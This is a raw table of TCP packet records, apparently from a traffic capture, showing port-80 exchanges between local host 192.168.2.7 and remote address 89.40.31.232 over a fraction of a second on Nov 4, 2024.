                                                              Nov 4, 2024 09:27:58.691800117 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.691823959 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.691848040 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.736229897 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.736291885 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.736361980 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.736372948 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.736401081 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.736422062 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.736543894 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.736562014 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.736568928 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.736581087 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.736582994 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.736592054 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.736598015 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.736614943 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.736644030 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.757599115 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.757611990 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.757625103 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.757636070 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.757647991 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.757652998 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.757688046 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.757744074 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.757914066 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.757920980 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.757927895 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.757939100 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.757951021 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.757967949 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.758080006 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.758093119 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.758104086 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.758120060 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.758128881 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.758142948 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.758168936 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.758265018 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.758276939 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.758290052 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.758311987 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.758337021 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.758404016 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.758415937 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.758424997 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.758435011 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.758446932 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.758449078 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.758460999 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.758471966 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.758475065 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.758488894 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.758517027 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.758547068 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.758558989 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.758569002 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.758579969 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.758591890 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.758598089 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.758604050 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.758630991 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.758722067 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.758728027 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.758737087 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.758749008 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.758754969 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.758764029 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.758774996 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.758785963 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.758788109 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.758826017 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.758826017 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.758888006 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.758900881 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.758924007 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.759068012 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.759079933 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.759090900 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.759102106 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.759102106 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.759114027 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.759116888 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.759134054 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.759202003 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.759212971 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.759226084 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.759234905 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.759248018 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.759259939 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.759263992 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.759273052 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.759274960 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.759287119 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.759298086 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.759301901 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.759320974 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.759324074 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.759334087 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.759340048 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.759347916 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.759361029 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.759377956 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.759378910 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.759402037 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.759416103 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.759537935 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.759550095 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.759562016 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.759573936 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.759574890 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.759588003 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.759610891 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.759690046 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.759704113 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.759716034 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.759741068 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.759762049 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.759850025 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.759861946 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.759872913 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.759885073 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.759896994 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.759897947 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.759912014 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.759924889 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.759926081 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.759941101 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.759960890 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.759994984 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.759994984 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.760153055 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.760166883 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.760179043 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.760189056 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.760204077 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.760229111 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.774878025 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.775022030 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.775027037 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.775037050 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.775049925 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.775068045 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.775074005 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.775084972 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.775093079 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.775098085 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.775111914 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.775125027 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.775127888 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.775155067 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.775180101 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.775192976 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.775202990 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.775224924 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.775239944 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.775362968 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.775374889 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.775404930 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.775418997 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.775551081 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.775563002 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.775574923 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.775588989 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.775608063 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.775618076 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.775705099 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.775716066 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.775728941 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.775739908 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.775739908 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.775752068 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.775763988 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.775764942 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.775778055 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.775790930 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.775810003 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.775863886 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.775877953 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.775888920 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.775897026 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.775902987 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.775927067 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.775950909 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.776063919 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.776077032 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.776087046 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.776099920 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.776110888 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.776139021 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.776217937 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.776230097 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.776241064 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.776257992 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.776285887 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.776381016 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.776396036 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.776406050 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.776417971 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.776428938 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.776429892 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.776456118 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.776469946 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.776634932 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.776648998 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.776659966 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.776674032 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.776683092 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.776686907 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.776700020 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.776710033 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.776715994 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.776725054 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.776751041 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.776802063 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.776813030 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.776823997 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.776834011 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.776839972 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.776848078 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.776863098 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.776887894 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.776989937 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.777003050 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.777014971 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.777023077 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.777028084 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.777038097 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.777040958 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.777051926 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.777055025 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.777067900 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.777081966 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.777110100 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.777124882 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.777137995 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.777148962 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.777168036 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.777211905 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.777479887 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.777491093 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.777502060 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.777513027 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.777524948 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.777535915 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.777537107 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.777550936 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.777564049 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.777568102 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.777581930 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.777582884 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.777606010 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.777628899 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.777637959 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.777653933 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.777666092 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.777674913 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.777678013 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.777686119 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.777693033 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.777705908 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.777715921 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.777749062 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.777776957 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.777785063 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.777839899 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.777937889 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.777951002 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.777961016 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.777973890 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.777980089 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.777987003 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.778009892 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.778028965 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.778884888 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.778897047 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.778908968 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.778917074 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.778934002 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.778954029 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.779046059 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.779057026 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.779072046 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.779078960 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.779109001 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.779123068 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.779151917 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.779181957 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.779181957 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.779181957 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.779299974 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.779318094 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.779330969 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.779344082 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.779344082 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.779351950 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.779360056 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.779365063 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.779376984 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.779378891 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.779412985 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.779443979 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.779454947 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.779469967 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.779481888 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.779522896 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.779522896 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.779638052 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.779648066 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.779659033 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.779669046 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.779671907 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.779680014 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.779689074 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.779705048 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.779717922 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.779725075 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.779752970 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.779763937 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.779777050 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.779777050 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.779795885 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.779814005 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.779949903 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.779963017 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.779973984 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.779985905 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.779998064 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.780009031 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.780023098 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.780034065 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.780041933 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.780070066 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.780086040 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.780124903 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.780759096 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.780802011 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.780941963 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.780952930 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.780968904 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.780987024 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.780991077 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.780999899 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.781022072 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.781037092 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.781076908 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.781090021 CET804993289.40.31.232192.168.2.7
